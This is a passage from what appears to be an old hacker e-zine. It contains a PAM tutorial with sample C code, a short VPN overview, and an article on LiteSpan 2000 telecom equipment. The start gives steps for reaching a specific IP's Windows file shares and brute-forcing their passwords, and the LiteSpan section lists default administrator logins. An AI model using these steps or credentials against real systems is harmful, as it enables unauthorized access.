|Note: this will list the remote hosts name. The name is set in the |
|control pannel/networking/indentification/computername. |
----------------------------------------------------------------------------
Now that you have the computer name you need to tell windows the IP that maps
to that computer name. So to do this you need to edit c:\windows\lmhosts
open it in notepad or whatever. It will look like this...
127.0.0.1 localhost
you want to add the ip 194.8.235.73 and then press tab and enter the
computer name. so the new hosts file will look like this.
127.0.0.1 localhost
194.8.235.73 MAILGATE
This sets up a computer name mapping to the IP address of the computer to try
and get into its filesharing. Save this and then click your Start Button then
goto find, then computer, then enter the computer name and it will connect to
that computer name that you added into the hosts file. It should show the
computer as being found. Double click it and then if your lucky it wont have
a password but if you arent you will be prompted for a password which you
will have to try and guess or use a brute force cracking program.
Hope this was a little help. If not at least you know how to use windows file
sharing...
Anyone good at codeing in windows? Wana code a brute force hacking program
for windows file sharing? E-Mail me.
Laterz
Chameleon
Chameleon@intercore.com.ar
InterCore Security Corp.
http://chameleon.core.com.ar
http://www.intercore.com.ar
irc.intercore.com.ar
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Write for THTJ.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 08 of 16
PAM - Pluggable Authentication Modules
By Scud-O, Editor in Chief
scud@thtj.com
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: PAM ³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I. Introduction
II. Modules
III. Services
IV. Configuration Files
V. Shadow Passwords
VI. How It Works
VI. The PAM API
VIII. Sample PAM Application
IX. References
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: I. Introduction ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Computers are insecure things. You and I both know that. And, In 1969 so
did the fine people at Bell Labs, who coded UNIX. Thus, UNIX needs to be
able to authenticate you before it can let you proceed. When you log into
any system, you enter a user name and password. These two things are used
to see if you are who you say you are. However, these are not the only
ways that you can be authenticated, and passwords can be stored in other ways
than just the good old /etc/passwd file. Before PAM, if you were to adopt a
system of authenication, you would have to recompile every single one of your
programs to support the authenication. Hence, may sysadmins did not use
alternate methods of authenication, and that is why it is so easy for you
and I to get into systems.
Enter PAM. PAM stands for 'Pluggable Authenication Modules' , and it is a
way of allowing a sysadmin to set up authenication on programs and services
on their system with out having to recompile everything. With PAM, you are
able to edit a configuration file, and easily control the module. The idea
behind PAM was created by both Vipin Samar and Roland J. Schemers, who
released their ideas in DCE-RFC-86.0 (rfc86.0.txt, see References on where
to get a copy of it) in October 1995. Both Samar and Schemers worked for Sun
Microsystems, but to date, the only UNIX version that really supports PAM is
Linux, and in particular Red Hat linux, who has used PAM since Red Hat 3.0.4.
In Solaris 2.5 PAM was partically implemented, and in Solaris 2.6, it is
expected to be fully functional.
If you are running a version of Rad Hat after 3.0.4, then you have been
using PAM and may not have known about it, since Red Hat's RPM package
manager automatically handles the changes to PAM if a package you install
requires it.
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: II. Modules ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
There are 4 types of modules defined in the PAM standard.
auth: provide the actual authenication (ie. asking for and checking a
password, and setting 'credentials' like groups, or creating a
kerberos 'ticket')
account: check to see if authenication is allowed, the account has not
expired or been deleted, the user is allowed to log in, etc.
password: used to set passwords
session: used once a user has successfully been authenicated to make it
possible to actually use there account, and mount their home
directory, or mail their mail available, etc.
Modules are made to be 'stacked' so that multiple modules can be used. For
example, rlogin normally makes use of at least 2 authenication methods: it
firsts used rhosts authenication, and if is succeeds, the connection is
opened, if not, standard password authenication is done.
New modules can be added at any time, and PAM aware applications can be
then made to use them. For example, if you use a one-time-password system for
something, then you can easily make a module to support it, since
documentation for writing modules are included with the system, and PAM aware
programs can use the new module and use the one-time-password system without
recompiling or modifing in anyway.
Here is a list of the modules that people are using/developing for use with
Linux-PAM:
The point of having modules is that you can just plug them in(!) In
other words, they do not need to be compiled with the Linux-PAM library to
work. Here are some alternative sources for modules that are being provided
independently of the main library:
- Thorsten Kukuk has produced a pam_keylogin module for NIS+ support.
ftp://weber.uni-paderborn.de/pub/linux/NIS/
- Luigi Catuogno is working on a Transparent Cryptographic Filesystem PAM
module - ftp://mikonos.dia.unisa.it/pub/tcfs/v2.0/pam
- Tom Ryan's modules: http://camlaw.rutgers.edu/pam/
- Tim Baverstock's modules (and more): http://www.mmm.co.uk/~warwick/pam/
- Kenny MacDonald has been making progress with a pam_nw_auth module.
K.MacDonald@ed.ac.uk
- David Airlie has produced a module that validates a username/password
combination using an NT server, it allows for domain validation.
http://www.csn.ul.ie/~airlied/pam_smb/
The following modules are (mostly) to be found in the Linux-PAM source tree:
- pam_cracklib: strength checking for new passwords. Requires the cracklib
library to compile: libcrack. Intended for stacking before other password
modules.
Cristian Gafton gafton@sorosis.ro
- pam_deny: deny all forms of access
Andrew Morgan morgan@parc.power.net
- pam_desgold: Enigma Logic DESGold card -- smart card
http://www.safeword.com/
Alexander O. Yuriev alex@yuriev.com
- pam_filter: module to allow easy access to the stdin/out of a running
process. It can be used to log users input etc..
Current pluggable filters include:
- upperLOWER: demonstration filter that transposes upper and lower
case characters.
You are encouraged to write your own.. (Email if you need help.)
Andrew Morgan morgan@parc.power.net
- pam_ftp: A module that checks if the user is `ftp' or `anonymous'. On
finding this to be the case, it prompts for a email address for a password,
and proceeds to set the PAM_RUSER item with this value.
Andrew Morgan morgan@parc.power.net
- pam_group: extension to the /etc/group concept. This module grants group
privileges based on who the user is when/where they are requesting a
service from and what they are trying to do;
Andrew Morgan morgan@parc.power.net
- pam_kerberos:
Kerberos authentication scheme;
Theodore Y. Ts'o tytso@mit.edu
An implementation has been written for Kerberos 4 authentication
ftp://ftp.dementia.org/pub/pam/
Derrick J Brashear shadow+@andrew.cmu.edu
Kerberos 5 authentication too - http://www-personal.engin.umich.edu/~itoi/
Naomaru Itoi itoi@eecs.umich.edu
- pam_limits: a module to set the resource limits for a service. Two
implementations of this have been merged to produce this module.
Cristian Gafton gafton@main.sorosis.ro and
Elliot Lee sopwith@redhat.com
- pam_listfile: authenticate users based on the contents of a specified file.
Elliot Lee sopwith@redhat.com
- pam_nologin: This module always lets root in; it lets other users in only
if the file /etc/nologin doesn't exist. In any case, if /etc/nologin
exists, it's contents are displayed to the user.
Michael K. Johnson johnsonm@redhat.com
- pam_opie: For Backgroud information, NRL OPIE is a newer one-time password
ftp://ftp.funet.fi/pub/unix/security/login/nrl-opie . The official OPIE
archive site is ftp://ftp.nrl.navy.mil/pub/security/opie . The contrib
subdirectory contains a number of S/Key, OTP, and OPIE compatible one-time
password calculators for Mac, PC, etc.
Andy Berkheimer andy@tho.org
http://www.tjhsst.edu/~aberkhei/ <--- PAM module source is here.
- pam_passwd+: password strength checking
Al Longyear longyear@netcom.com
- pam_permit: always allow access;
Andrew Morgan morgan@parc.power.net
- pam_pwdb: plug in replacement for pam_unix_* that uses the Password
Database library found at: http://parc.power.net/morgan/libpwdb/
Andrew Morgan morgan@parc.power.net
- pam_radius: RADIUS authentication, using the Password Database library.
Cristian Gafton gafton@sorosis.ro
- pam_rhosts: rhost verification as per rlogin etc..;
Al Longyear longyear@netcom.com
- pam_rootok: module to authenticate the user if their (real) uid is root
(intendend for use with the sufficient control flag);
Andrew Morgan <morgan@parc.power.net></em>
- pam_securetty: /etc/securetty access controls
Elliot Lee sopwith@redhat.com
- pam_shells: authenticate users if their shell is listed in the
/etc/shells file.
Erik Troan ewt@redhat.com
- pam_sid: Smart card - SecureID
SecureID - http://www.secnet.com
Some comments on security problems -
ftp://ftp.secnet.com/pub/papers/securid.ps
Alexander O. Yuriev alex@bach.cis.temple.edu
- pam_skey: S/Key authentication
Jeff Uphoff juphoff@tarsier.cv.nrao.edu
ftp://linux.nrao.edu/pub/people/juphoff/PAM/
- pam_skey2: is being worked on by Sean Reifschneider - jafo@tummy.com
- pam_stress: stress test your application with this module.
Andrew Morgan morgan@parc.power.net
- pam_tally: this module keeps track of the number of times an attempt is
made to access an account. It can deny access after a specified number of
failures. Root's account can be treated specially.
Tim Baverstock warwick@mmm.co.uk
- pam_time: authorize users based on when and where they log in (like
securetty, but) in a way that is dependent on the service they are
requesting
Andrew Morgan morgan@parc.power.net
- pam_unix_*: standard unix authentication (with some shadow support);
This module is being supported by Red Hat.
Michael K. Johnson johnsonm@redhat.com
- pam_warn: provides a diagnostic tool for dumping information to syslog(2)
about the service-application.
Andrew G. Morgan morgan@parc.power.net
- pam_wheel: for enforcing the wheel group privileges;
Cristian Gafton gafton@sorosis.ro
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: III. Services ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
A quick note about services. Each program that uses PAM defines its own
service name. The login program defines the service type login, ftpd defines
the service type ftp, and so on. In general, the service type is the name of
the program used to _access_ the service, not the program used to _provide_
the service. (The ftpd being defined as ftp is an example.)
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: IV. Configuration Files ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The directory /etc/pam.d is used to configure all PAM applictions. Earlier
PAM versions used to use /etc/pam.conf, but that file is now only read if
no /etc/pam.d/ entry is found. Each application (service) has its own file.
A file might look a little something like this:
( this is tghe file for the basic login 'service' )
#%PAM-1.0
#Module Type Control Flag Module Path Options
#----------- ------------ ----------- -------
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_pwdb.so shadow nullok
auth required /lib/security/pam_nologin.so
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so shadow nullok use_authok
session required /lib/security/pam_pwdb.so
The first 3 lines, are of course a comment. The next 3 lines stack up 3
modules for use to login authorization. The first line makes sure that if
the user is trying to log in as root, the tty they are logging in is listed
in /etc/securetty, if the file does exist. The second line causes the user
to be asked for a password and to then check the password. The third line
then looks to see if the file /etc/nologin exists, and if it does, displays
the contents of the file, and then boots off the user if it is not root.
Note that all three of these modules are checked, _even if the first module
fails_. This was built in as a security precaution. If a user (read: hacker)
knew why the authenication failed, then they might be able to figure out how
to get around the problem and break the authenication easily. If you want to
change this, you can change 'required' to 'requisite', since if a requisite
module fails, PAM immediately and does not call the other modules.
The line after that (line 7) checks and causes any necessary accouting to be
done. (i.e. if shadow passwords have been enabled, the pam_pwdb.so module
would check to see if the account has expired, of if the user's password
has expired and needs to be changed.)
Line 8 then specifies that if the login changes the users password, it should
use pam_pwdb.so to do it. This will only occur if the auth module determines
that the password needs to be changed, for example, if the shadow password
has expired.
The last line then goes on to specify that pam_pwdb.so should be used to
manage the session. Currently, that module does not do anything, but it could
be replaced, or supplemented by stacking a module or two.
Note that the order of the lines matters. While it may not matter for the
order of the required modules, it matters for the other control flags
available for use. sufficent and requisite cause order to be important, as
does optional, which is a flag that is rarely used. For an example of this,
turn to your rlogin auth configuration, which should look something like:
auth required /lib/security/pam_securetty.so
auth sufficent /lib/security/pam_rhosts_auth.so
auth required /lib/security/pam_pwdb.so shadow nullok
auth required /lib/security/pam_nologin.so
Now, this file looks almost like the login entry, the extra line and the
sufficent make the order of the modules important.
First off, pam_securetty.so keeps root from loging in on insecure terminals,
which quite effectively prevents rhost root logins. If you wish to allow them
you can simply remove that line.
Second, if pam_rhosts_auth.so authenticates the user, then PAM skips the
password checking, otherwise if it fails, then the failed authentication is
ignored. If pam_rhosts_auth.so fails to authenicate the user, then
pam_pwdb.so is used to do normal password authentication.
Finally, pam_nologin.so checks /etc/nologin.
Note that if you do not want to prompt for a password if the securetty checks
fail, then you can modify pam_securetty.so from required to requisite.
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: V. Shadow Passwords ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
A quick note for Red Hat users, if you wish to use PAM and shadow passwords,
you are in luck. pam_pwdb.so can support shadow passwords. To convert your
system for shadow passwords, use the following commands:
cd /etc
pwconv5
chmod 600 passwd- shadow-
pam_pwdb.so will automatically detect that you have implemented shadow
passwords, and it will make all the adjustments necessary.
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: VI. How It Works ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The core components of the PAM framework are the authentication library API
front end and the authentication mechanism-specific modules back end,
connected through the Service Provider Interface. Applications write to the
PAM API, while the authentication-system providers write to the PAM SPI and
supply the back end modules that are independent of the application.
ftp telnet login <-- Applications
³ ³ ³
³ ³ ³
ÀÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÙ
³
ÚÄÄÄÄÄÁÄÄÄÄÄ¿
³ PAM API ³ <-- pam.conf | /etc/pam.d/
ÀÄÄÄÄÄÂÄÄÄÄÄÙ
³
ÚÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ¿
UNIX Kerberos Smart Cards <-- Mechanisms
Basic PAM Architecture
The figure above illustrates the relationship between the application, the
PAM library, and the authentication modules. Three application (login,
telnet and ftp) are shown which use the PAM authentication interfaces. When
an application makes a call to the PAM API, it loads the appropriate
authentication module as determined by the configuration file, /etc/pam.d/,
unless this is not found, then pam.conf is used. The request is forwarded to
the underlying authentication module (for example, UNIX password, Kerberos,
etc.) to perform the specified operation. The PAM layer then returns the
response from the authentication module to the application.
PAM unifies system authentication and access control for the system, and
allows plugging of associated authentication modules through well defined
interfaces. The plugging can be defined through various means, one of which
uses a configuration file, as shown in Section IV. Each of the system
applications, the file specifies the authentication module that should be
loaded.
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: VII. The PAM API ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The following should give you an basic description of the various interfaces
of PAM. Since the goal here is just for you to get a working knowledge about
the PAM interfaces, not all flags and options have been fully defined and
explained.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Framework Layer APIs
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int
pam_start(
char *service_name,
char *user,
struct pam_conv *pam_conversation,
pam_handle_t **pamh
);
pam_start() is called to initiate an authentication transaction. pam_start()
takes as arguments the name of the service, the name of the user to be
authenticated, the address of the conversation structure. pamh is later used
as a handle for subsequent calls to the PAM library.
The PAM modules do not communicate directly with the user; instead they rely
on the application to perform all such interaction. The application needs to
provide the conversation functions, conv(), and associated application data
pointers through a pam_conv structure when it initiates an authentication
transaction. The module uses the conv() function to prompt the user for
data, display error messages, or text information.
int
pam_end(
pam_handle_t *pamh,
int pam_status
);
pam_end() is called to terminate the PAM transaction as specified by pamh,
and to free any storage area allocated by the PAM modules with
pam_set_item().
int
pam_set_item(
pam_handle_t *pamh,
int item_type,
void *item
);
int
pam_get_item(
pam_handle_t *pamh,
int item_type,
void **item);
pam_get_item() and pam_set_item() allow the parameters specified in the
initial call to pam_start() to be read and updated. This is useful when a
particular parameter is not available when pam_start() is called or must be
modified after the initial call to pam_start(). pam_set_item() is passed a
pointer to the object, item, and its type, item_type. pam_get_item() is
passed the address of the pointer, item, which is assigned the address of
the requested object.
The item_type will be one of the following:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Item Name ³ Description ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ PAM_SERVICE ³ The service name ³
³ PAM_USER ³ The user name ³
³ PAM_TTY ³
The tty name ³
³ PAM_RHOST ³ The remote host name ³
³ PAM_CONV ³ The pam_conv structure ³
³ PAM_AUTHTOK ³ The authentication token (password)³
³ PAM_OLDAUTHTOK ³ The old authentication token ³
³ PAM_RUSER ³ The remote user name ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Note: that the values of PAM_AUTHTOK and PAM_OLDAUTHTOK are only available to
PAM modules and not to the applications. They are explicitly cleared out by
the framework before returning to the application.
char *
pam_strerror(
int errnum
);
pam_strerror() maps the error number to a PAM error message string, and
returns a pointer to that string.
int
pam_set_data(
pam_handle_t *pamh,
char *module_data_name,
char *data,
(*cleanup)(pam_handle_t *pamh, char *data,
int error_status)
);
The pam_set_data() function stores module specific data within the PAM
handle. The module_data_name uniquely specifies the name to which some data
and cleanup callback function can be attached. The cleanup function is
called when pam_end() is invoked.
int
pam_get_data(
pam_handle_t *pamh,
char *module_data_name,
void **datap
);
The pam_get_data() function obtains module-specific data from the PAM handle
stored previously by the pam_get_data() function. The module_data_name
uniquely specifies the name for which data has to be obtained. This function
is normally used to retrieve module specific state information.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Authentication APIs
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int
pam_authenticate(
pam_handle_t *pamh,
int flags
);
The pam_authenticate() function is called to verify the identity of the
current user. The user is usually required to enter a password or similar
authentication token, depending upon the authentication module configured
with the system. The user in question is specified by a prior call to
pam_start(), and is referenced by the authentication handle, pamh.
int
pam_setcred(
pam_handle_t *pamh,
int flags
);
The pam_setcred() function is called to set the credentials of the current
process associated with the authentication handle, pamh. The actions that can
be denoted through flags include credential initialization, refresh,
reinitialization and deletion.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Password Management APIs
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int
pam_chauthtok(
pam_handle_t *pamh,
int flags
);
pam_chauthtok() is called to change the authentication token associated with
the user referenced by the authentication handle pamh. After the call, the
authentication token of the user will be changed in accordance with the
authentication module configured on the system.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Session Management APIs
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int
pam_open_session(
pam_handle_t *pamh,
int flags
);
pam_open_session() is called to inform the session modules that a new session
has been initialized. All programs which use PAM should invoke
pam_open_session() when beginning a new session.
int
pam_close_session(
pam_handle_t *pamh,
int flags
);
Upon termination of this session, the pam_close_session() function should be
invoked to inform the underlying modules that the session has terminated.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Account Management API
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int
pam_acct_mgmt(
pam_handle_t *pamh,
int flags
);
The function pam_acct_mgmt() is called to determine whether the current
user's account and password are valid. This typically includes checking for
password and account expiration, valid login times, etc. The user in
question is specified by a prior call to pam_start() and is referenced by the
authentication handle, pamh.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The PAM Service Provider Interface:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is very similar to the PAM API, except for one extra parameter to
pass module-specific options to theunderlying modules.
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: VIII. Sample PAM Application ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Below is a sample login application which uses the PAM APIs. It is not meant
to be a fully functional login program, alot of functionality has been left
out in order to show and emphasize the use of PAM APIs.
#include <security/pam_appl.h>
static int login_conv(int num_msg, struct pam_message **msg,
struct pam_response **response, void *appdata_ptr);
static struct pam_conv pam_conv = {login_conv, NULL};
static pam_handle_t *pamh; /* Authentication handle */
void
main(int argc, char *argv[], char **renvp)
{
/*
* Call pam_start to initiate a PAM authentication operation
*/
if ((pam_start("login", user_name, &pam_conv, &pamh))
!= PAM_SUCCESS)
login_exit(1);
pam_set_item(pamh, PAM_TTY, ttyn);
pam_set_item(pamh, PAM_RHOST, remote_host);
while (!authenticated && retry < MAX_RETRIES) {
status = pam_authenticate(pamh, 0);
authenticated = (status == PAM_SUCCESS);
}
if (status != PAM_SUCCESS) {
fprintf(stderr,"error: %s\n", pam_strerror(status));
login_exit(1);
}
/* now check if the authenticated user is allowed to login. */
if ((status = pam_acct_mgmt(pamh, 0)) != PAM_SUCCESS) {
if (status == PAM_AUTHTOK_EXPIRED) {
status = pam_chauthtok(pamh, 0);
if (status != PAM_SUCCESS)
login_exit(1);
} else {
login_exit(1);
}
}
/*
* call pam_open_session to open the authenticated session
* pam_close_session gets called by the process that
* cleans up the utmp entry (i.e., init)
*/
if (status = pam_open_session(pamh, 0) != PAM_SUCCESS) {
login_exit(status);
}
/* set up the process credentials */
setgid(pwd->pw_gid);
/*
* Initialize the supplementary group access list.
* This should be done before pam_setcred because
* the PAM modules might add groups during the pam_setcred call
*/
initgroups(user_name, pwd->pw_gid);
status = pam_setcred(pamh, PAM_ESTABLISH_CRED);
if (status != PAM_SUCCESS) {
login_exit(status);
}
/* set the real (and effective) UID */
setuid(pwd->pw_uid);
pam_end(pamh, PAM_SUCCESS); /* Done using PAM */
/*
* Add DCE/Kerberos cred name, if any.
* XXX - The module specific stuff should be removed from login
* program eventually. This is better placed in DCE module and
* will be once PAM has routines for "exporting" environment
* variables.
*/
krb5p = getenv("KRB5CCNAME");
if (krb5p != NULL) {
ENVSTRNCAT(krb5ccname, krb5p);
envinit[basicenv++] = krb5ccname;
}
environ = envinit; /* Switch to the new environment. */
exec_the_shell();
/* All done */
}
/*
* login_exit - Call exit() and terminate.
* This function is here for PAM so cleanup can
* be done before the process exits.
*/
static void
login_exit(int exit_code)
{
if (pamh)
pam_end(pamh, PAM_ABORT);
exit(exit_code);
/*NOTREACHED*/
}
/*
* login_conv():
* This is the conv (conversation) function called from
* a PAM authentication module to print error messages
* or garner information from the user.
*/
static int
login_conv(int num_msg, struct pam_message **msg,
struct pam_response **response, void *appdata_ptr)
{
while (num_msg--) {
switch (m->msg_style) {
case PAM_PROMPT_ECHO_OFF:
r->resp = strdup(getpass(m->msg));
break;
case PAM_PROMPT_ECHO_ON:
(void) fputs(m->msg, stdout);
r->resp = malloc(PAM_MAX_RESP_SIZE);
fgets(r->resp, PAM_MAX_RESP_SIZE, stdin);
/* add code here to remove \n from fputs */
break;
case PAM_ERROR_MSG:
(void) fputs(m->msg, stderr);
break;
case PAM_TEXT_INFO:
(void) fputs(m->msg, stdout);
break;
default:
/* add code here to log error message, etc */
break;
}
}
return (PAM_SUCCESS);
}
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: IX. References ³
ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
DCE-RFC-86.0 (rfc86.0.txt) -
http://www.redhat.com/linux-info/PAM/rfc86.0.txt
( among a million other places )
Red Hat PAM info - http://www.redhat.com/linux-info/PAM/
Linux-PAM Effort - http://www.parc.power.net/morgan/Linux-PAM/index.html
System Administrator's Guide
Module Writer's Guide
Application Developer's Manual
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 09 of 16
VPN's Demystified
by Meikon, Special to thtj
VPN's short for Virtual Private Networks are secure networks
that implement encryption to communicate between two users. It allows
private communication over virtual WANs or LANs. The VPN can also
be implemented in X.25 networks. VPN's also provide secure data
transmission with Tunneling Protocol through the Internet.
With standard networks, a sniffer can easily overcome security.
In a VPN , there are thre eimplementations used.
1. Encryption - use of algorithm to encrypt and decrypt data transfer.
2. Authentication - confirmation of users identity on the network (use
public key authentication to confirm users connection) also sometimes
use of login and password , which is vunerable to crackers.
3. Data Integrity - hash used , differnet hashes used : Message
Digest (MD5) , Secure Hash Algorithm1 (SHA-1). The MD5 Hash generates
128-bit keys. The SHA-1 Hash generates 160-bit keys.
- VPN's Sources on the Internet -
http://www.TeleCommerce.com/ - TeleCommerce, Inc
http://www.francetelecom.fr/ - France Telecom
http://www.rad.net.id/homes/edward/intranet/intra7 - Information on VPN's
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 10 of 16
LiteSpan 2000
by XiLiCoN, Special to thtj
A Litespan 2000 unit is a Synchronous Optical Network (SONET) based
Optical Loop Carrier (OLC) system. It provides 4 system functions.
Those systems are as follows:
DLC) Digital Loop Carrier: Provides 2,016 DS0s of bandwidth for delivery of
services such as data, coin, or dial tone.
DCS) Digital Cross Connect System: Takes apart DS1 signals into DS0,
rearranges them and puts them back into DS1 signals. This is know as
1-0-1 cross-connect.
SONET) Fiber transport system: Uses lightwave technology and SONET protocol to
transport signals between lightspan terminals.
MUX) Mulitplexer: Takes multiple low speed signals(DS0s, DS1s) and interleaves
them to form a single high speed data stream at SONET bit rates.
_,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,__,.-System Security-.,_,.-~-.,_,.-~-.,,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,_
The Litespan provides two levels of security to maintain system
integrity. These security levels controls who can access the system
and what the authorized user is allowed to do in the system.
- Each authorized user is assigned a set of privileges that determine the
actions allowed to the user.
- The Litespan maintains an internal list of authorized user IDs, passwords,
and user privileges.
- There are up to 20 users possible.
Now to access security.you will be prompted for a User Id and a
Password at a terminal that looks much like this:
OMAPS Log In
OMAPS V05.01.05 Copyright 1997 Optlink Corp. All Rights Reserved
User Id:
Password:
Now for the ball busting part. If you repeat the login procedure
incorrectly 5 times you will be locked out of the system. Also the
user id's can be up to 20 character, number or letter with both upper
and lower case. Same with the password. The litespan has a sysadmin
like in a unix system, but the litespan admin usually has a long
beard and a smug expression. But it is possible that a dumb sysadmin
will leave in the default logins/passwords. Those are as follows:
User Id: optlink
Password: optlink
and..
User Id: sysadmin
Password: sysadmin
Well that gives you a look at System Security from the outside, Look
at part 3 if you were able to get in. It gives a run down on User
Privileges.
User Privleges. Well user privileges are important, the sysadmin
maintains a file in the system that gives different users different
privileges. The user privileges file will be setup somewhat like this:
User Id Password CP M M0 M1 N NR P PR P0 P1 S T
User1 ***** x x x x x x
User2 ***** x x x x x x
That is a basic layout. The CP, M, M0 ect. are privileges. The X's
are basically checks allowing a certain user to perform a certain act
in the system. The Different Privileges are as follows:
CP = Allows someone to change the user id, password or privileges of any user
on the system. This is one of the sysadmins privileges for the most part.
M0 = Maintenance privlege (DS0 only)
M1 = Maintenance privlege (DS1 only)
MR = Maintenace READ ONLY privlege
N = Network Administrative privlege; Allows backup and restore of database
NR = Network Administrative READ ONLY privlege; Allows access to network
information
P = Provisioning privlege; Necessary to make changes from the provisioning
menu
P0 = Provisioning privlege (DS0 only)
P1 = Provisioning privlege (DS1 only)
PR = Provisioning READ ONLY privilege
S = System Administrative privlege; Necessary to make changes from the
administrative menu
T = Testing privlege; Allows execution of testing commands
Well thats it!
Triviality is only skin deep-XiLiCoN
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
The Code:
o genericrack2.pas - The Messiah : Pascal code to crack encryption
from an issue of CRH
o genericrack2.c - Shok : C Ported code of genericrack2.pas
o word.c - memor : Word List Processor
o rm.c Fix - Shok : fixed holes in rm.c from thtj15
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 11 of 16
genericrack2.pas
By The Messiah, Staff Writer
program genericrack2;
uses
SysUtils;
const
MAXKEY = 1024;
var
